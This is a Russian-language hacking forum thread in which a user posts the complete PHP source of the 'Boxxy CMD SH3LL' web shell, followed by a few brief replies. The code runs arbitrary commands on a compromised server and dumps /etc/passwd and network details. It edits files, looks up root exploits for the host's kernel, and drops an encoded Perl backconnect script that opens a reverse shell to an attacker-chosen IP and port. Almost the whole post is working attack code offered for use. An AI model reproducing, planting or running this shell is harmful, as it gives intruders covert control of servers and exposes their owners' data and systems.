1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Boxxy CMD SH3LL v1.002- Public release

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем bios, 12 янв 2013.

  1. TopicStarter Overlay
    bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    [​IMG]

    Код:
    <?php
    $auth = 1;
     
    $name='21a3f41e963386efe3642db95f0efe24'; //(user login) //boxxy // ChangeME // MD5
    $pass='21a3f41e963386efe3642db95f0efe24'; //(user password) //boxxy // ChangeME // MD5
    /******************************************************************************************************/
    if($auth == 1) {
    if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)
      {
      header('WWW-Authenticate: Basic realm="Boxxy CMD SH3LL"');
      header('HTTP/1.0 401 Unauthorized');
      exit("<center><b>Oh no you didn't!</b></center>");
      }
    }
    ?>
    <title>
    Boxxy CMD SH3LL
    </title>
    <STYLE type="text/css">
    input.input, textarea {
    font:Arial, sans-serif;
    color:red;
    }
    input.console, textarea {
    font:Arial, sans-serif;
    color:green;
    background:black;
    }
    </STYLE>
    <script>
    function derp()
    {
    ip = ip.value;
    port = port.value;
    derp = 'perl bc.pl ' + ip + port;
    }
    </script>
    <?php
    $cmdsh3ll = basename($_SERVER['PHP_SELF']);
    $serverip = $_SERVER['SERVER_ADDR'];
    $pwd = exec('pwd');
    $value = $_POST["x"];
    $edit = $_POST["a"];
    $backconnect = $_POST["b"];
    $editme = $_POST["f"];
    //Perl backconnect code - Borrowed from i-47 shell
    $backconnect_perl="pVRdb9owFH3Pr7hNq5FMgQB7mEREtTaEgaZCRaAvFKGQXMBasCPbWYmm/fc5TtDYRtWHOlIS33N8zvFHcn3l5oK7G0LdDHlq5AJhPO31QhZ/R+kZN6IQEg+gWh8amreJxL6hkLvZV7//Rd2fPDDIFixduep3bfgJhhqQcUIlmAsR7bAHN21YjpiQK1g+Mq4ez/SZmp5mJgTBDI6a1Ol+brXV1YFup9uBivMLdLI6VdUZkhRHEU1SVAWhESuc+t+CuQOPw/V4Ur6UhXU4nwV3Dw7sUGacSbYpaHRAqyHjrGHbwLgOUMddNlewoNEmRZAMZihY+gOhTF5FiRmlGP+xKp2jJOFrQvUKPC07KwcIRbmOJDvV2iv7DSe/0j1zOtE+ruoYhO40PFHpS8o5ox6uKK1WC06m8J9SmEUvtBQK95im8IoMJmUkjgcmEfbKsiJWc27eRrlk2zQXe8tW6ixDaoXzwXjigHn7oSKZ58h0MXcuI8Fs9g9Sh+m/o51Pqnmx3bPjsQD/YQDh6FOaXiY139bxWaKW6r4ALfiKzF8675uXVqo+ScvEeM/AdUPdJXTLXNeDvDza0Iy8EvUMzVkI5CXuAUmqui4PCFdbzXjhQfZSA6CR6mzo7ajN6v+A7RnXwXT4Gw==";
    if(!($value != NULL))
    {
    $value2 = "feed me commands!";
    }
    else
    {
    $value2 = $value;
    }
    ?>
    <body bgcolor="gray">
    <?php
    //exploit search
    $Lversion = php_uname(r);
    $OSV = php_uname(s);
    if(eregi('Linux',$OSV))
    {
    $Lversion=substr($Lversion,0,6);
    $exploit="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$Lversion;
    $google="http://www.blackle.nl/?cx=partner-pub-3587004543063400%3As3fh9t2ic5k&cof=FORID%3A10&q=".$OSV.' '.$Lversion.' root exploit';
    }else{
    $Lversion=substr($Lversion,0,3);
    $exploit="http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=".$OSV.' '.$Lversion;
    $google="http://www.blackle.nl/?cx=partner-pub-3587004543063400%3As3fh9t2ic5k&cof=FORID%3A10&q=".$OSV.' '.$Lversion.' root exploit';
    }
    if ($value == 'exploit') {
    echo '
    <form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="Welcome back!" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>
     
    <iframe src ="'.$google.'"
    height="45%"
    width="100%" frameborder="0">
    </iframe><br />
    <iframe src ="'.$exploit.'"
    height="45%"
    width="100%" frameborder="0">
    </iframe>';
    die();
    }
    ?>
    <?php
    //reserved For backconnect
    if ($backconnect == 'backconnect') {
                if(is_writable("."))
                {   
                    @$fh=fopen(getcwd()."/bc.pl",'w');
                    @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
                    @fclose($fh);
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="perl bc.pl" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    ?>
    IP: <input type="text" id="iptxt" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/></td><br/>
    PORT: <input type="text" id="porttxt" name="port" value="1337"/></td><br />
     
    <form name="input" action="<?php echo($cmdsh3ll); ?>" method="post">
     
    <input type="hidden" value="" id="combined" name="x"/>
    <input type="submit" onclick="Combine()" value="Connect!">
     
    </form>
    <script>
    function Combine()
    {
        combined.value =  'perl bc.pl ' + iptxt.value + ' ' + porttxt.value;
    }
    </script>
    <?
                    echo "<div align='center'>You should use NetCat \"nc -l -n -v -p port\"! Before Clicking connect!</font></div></br>";
                }
                else
                {
                    @$fh=fopen("/tmp/bc.pl","w");
                    @fwrite($fh,gzinflate(base64_decode($backconnect_perl)));
                    @fclose($fh);
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="perl /tmp/bc.pl" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    ?>
    IP: <input type="text" id="iptxt" name="ip" value="<?php echo $_SERVER['REMOTE_ADDR']; ?>"/></td><br/>
    PORT: <input type="text" id="porttxt" name="port" value="1337"/></td><br />
     
    <form name="input" action="<?php echo($cmdsh3ll); ?>" method="post">
     
    <input type="hidden" value="" id="combined" name="x"/>
    <input type="submit" onclick="Combine()" value="Connect!">
     
    </form>
    <script>
    function Combine()
    {
        combined.value =  'perl /tmp/bc.pl ' + iptxt.value + ' ' + porttxt.value;
    }
    </script>
    <?
                    echo "<div align='center'>You should use NetCat \"nc -l -n -v -p port\"! Before Clicking connect!</font></div></br>";
                }
    ?>
    <?
    die();
    }
    ?>
    <?php
    //reserved For General info
    if ($value == 'generalinfo') {
    echo('<form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="Welcome back!" name="x"/>
    <input type="submit"  style="width: 100%" value="Go back"/>');
    $uname = php_uname();
    $soft = $_SERVER["SERVER_SOFTWARE"];
    $curuser = @exec('whoami');
    echo("<center><b>General info</b></center><br /><br />");
    echo("<b>Host:</b> " . $_SERVER['SERVER_ADDR'] ."&nbsp//&nbsp". $_SERVER['SERVER_NAME']."<br>");
    echo("<b>Server software:</b> " . $soft . "<br>");
    echo("<b>Uname:</b> " . $uname . "<br>");
    echo("<b>Shell Directory:</b> " . getcwd() . "<br>");
    echo("<b>Current User:</b> " . $curuser . "<br>");
    echo("<b>ID:</b> " . @exec('id') . "<br>");
    if(@ini_get('safe_mode') != ""){echo("<b>Safemode:</b> <font color='red'>ON</font>");}
    else{echo("<b>Safemode:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('open_basedir') != ""){echo("<b>Open Base Dir:</b> <font color='red'>ON</font> [ " . ini_get('open_basedir') . " ]");}
    else{echo("<b>Open Base Dir:</b> <font color='green'>OFF</font>");}
    echo("\n<br>\n");
    if(@ini_get('disable_functions') != ""){echo("<b>Disabled functions:</b> " . @ini_get('disable_functions'));}
    else{echo("<b>Disabled functions:</b> <font color='green'>None</font>");}
    echo("\n<br>\n");
    if(@function_exists(mysql_connect)){echo("<b>MySQL:</b> <font color='green'>ON</font><br />");}
    else{echo("<b>MySQL:</b> <font color='red'>OFF</font><br />");}
    echo("<b>Open Sockets check // For Backconnects</b><br />");
    $fp = fsockopen("www.example.com", 80, $errno, $errstr, 30);
    if (!$fp) {
        echo "$errstr ($errno)<br />\n";
    echo("No, no <font color='red'>NETCAT</font> for you!");
    } else {
        $out = "GET / HTTP/1.1\r\n";
        $out .= "Host: www.example.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
           
        fwrite($fp, $out);
        fclose($fp);
    echo("Yes you can use <font color='green'>NETCAT</font>");
    }
     
    die();
    }
    ?>
    <?php
    //Reserved For Edit
    if ($edit == "edit") {
    echo '
    <form action="'.$cmdsh3ll.'" method="post">
    <input type="hidden" class="input" value="" name=""/>
    <input type="submit"  style="width: 100%" value="Go back"/>
    </form>';
     
    ?>
    <?php
    $filename = $editme;
    if(!($filename != NULL))
    {
    Echo("<h3>You forgot to put in a Filename! please try again!</h3>");
    }
    else
    {
      $newdata = $_POST['newd'];
    if ($newdata != '') {
    $fw = fopen($filename, 'w') or die('Could not open file!');
    $fb = fwrite($fw,stripslashes($newdata)) or die('Could not write 
    to file');
    fclose($fw);
    }
      $fh = fopen($filename, "r") or die("Could not open file!");
      $data = fread($fh, filesize($filename)) or die("Could not read file!");
      fclose($fh);
    echo "<center>
    <form action='".$_SERVER[php_self]."' method= 'post'>
    <input type='hidden' class='input' value='edit' name='a'/>
    <input class='input' value='".$filename."' name='f' readonly='readonly' style='background-color: lightgray; width: 50%'/>
    <br />
    <textarea name='newd' cols='100%' rows='46'>".htmlspecialchars($data)."</textarea>
    <center>
    <input type='submit' value='Change' style='width: 100%'>
    </form>";
    }
    die();
    }
    ?>
     
    <?php
    //safemode
    if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
    {
    $safemode = TRUE;
    $hsafemode = "<FONT color='red'>ON (secure)</font>";
    }
    else {$safemode = FALSE; $hsafemode = "<font color='green'>OFF (not secure)</font>";}
    ?>
    <font color="white" style='BACKGROUND-COLOR: black'>//&nbsp;&nbsp;&nbsp;<b>Server ip:&nbsp;</b><font color='green'><?php echo($serverip); ?></font>&nbsp;&nbsp;&nbsp;//&nbsp;&nbsp;&nbsp; <b>Safe-mode:</b>&nbsp;<?php echo $hsafemode; ?><?php echo("&nbsp;&nbsp;&nbsp; //&nbsp;&nbsp;&nbsp;<b>Current DIR:</b>&nbsp;" . exec('pwd') . "/" . basename($_SERVER['PHP_SELF'])); ?>
     
     
     
    </font>
    <!-- Buttons -->
    <center>
    <table>
    <tbody>
        <tr>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post">||<input type="hidden" class="input" value="ls -l" name="x"/>
            <input type="submit" value="list dir"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ls -l /var/log" name="x"/>
            <input type="submit" value="list logs"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ls -l /home" name="x"/>
            <input type="submit" value="list home"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="cat /etc/passwd" name="x"/>
            <input type="submit" value="show passwd"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="netstat -an | grep -i ESTABLISHED" name="x"/>
            <input type="submit" value="Open Connections"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="netstat -an | grep -i LISTEN" name="x"/>
            <input type="submit" value="Open Ports"/> || </form>
            <td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="cat /etc/hosts" name="x"/>
            <input type="submit" value="Hosts"/> || </form>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="ifconfig -a" name="x"/>
            <input type="submit" value="Ipconfig"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="uname -a" name="x"/>
            <input type="submit" value="uname -a"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="id" name="x"/>
            <input type="submit" value="ID"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="generalinfo" name="x"/>
            <input type="submit" value="Server info"/> || </form>
            </td> 
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="exploit" name="x"/>
            <input type="submit" value="Find Exploit"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="backconnect" name="b"/>
            <input type="submit" value="Backconnect"/> || </form>
            </td>
            <td>
            <form action="<?php echo($cmdsh3ll); ?>" method="post"><input type="hidden" class="input" value="echo 'CMD SH3LL V1.002 Made By Boxxy' && echo '' && echo 'Thanks to Uitklapbare eekhoorn, Noxxie, Zer0spoof, and hackflag.org' && echo '' && echo 'Bugs:' && echo 'Ip config is not working on all servers! / still finding a fix!' && echo ''  && echo 'Please Notify me of any other bugs!' && echo '' && echo 'thanks for using my cmd shell' " name="x"/>
            <input type="submit" value="credits"/> || </form>
            </td>
      </tr>
    </tbody>
    </table>
    </center>
    <!-- /buttons -->
     
    <!-- CMD line -->
    <table>
    <tr>
    <td style="width: 80%">
    <form action="<?php echo($cmdsh3ll); ?>" method="post">
    <input type="text" class="input" value="<?php echo $value2;?>" name="x" style="width: 100%"/><br />
    <input type="submit" style="width: 100%" />
    </form>
    </td>
            <td style="width: 20%">
          <form action="" method="post">
            <input type="hidden" value="edit" name="a">
            <input class="input" value="Filename - if not in same dir inc full path" name="f" style="width: 100%"/><br />
            <input type="submit" value="Edit" style="width: 100%"/></form>
            </td>
            <td>
    </tr>
    </table>
    <!-- /CMD line -->
     
    <font color="green">
    <?php
    //CMD Parser
    echo "<center><textarea rows='40' cols='100' class='console'>";
    exec('id && ' . $value, $results);
    foreach(array_slice($results,1,count($results)) as $file) {
        echo htmlspecialchars($file) . "\n";
    }
    echo "</textarea></center>";
    ?>
    </font>
    <center><font color="white" style='BACKGROUND-COLOR: black'>//&nbsp;CMD SH3LL V1.002 Made by Boxxy // </font></center>
    </body>
    </html>
     
    • Like Like x 1
    Метки:
  2. ImDeniil

    ImDeniil Гость

    Ну хотя бы описание что ли
     
  3. TopicStarter Overlay
    bios

    bios

    Регистрация:
    22 июн 2012
    Сообщения:
    539
    Симпатии:
    622
    что описание то шелл как шелл :confused:
     
  4. ImDeniil

    ImDeniil Гость

    Я шелл в первые вижу:D
     
  5. }{OTT@BY4

    }{OTT@BY4 Гость

    "Показать пароли" - сомнительная ф-ция:)
     

Поделиться этой страницей

Загрузка...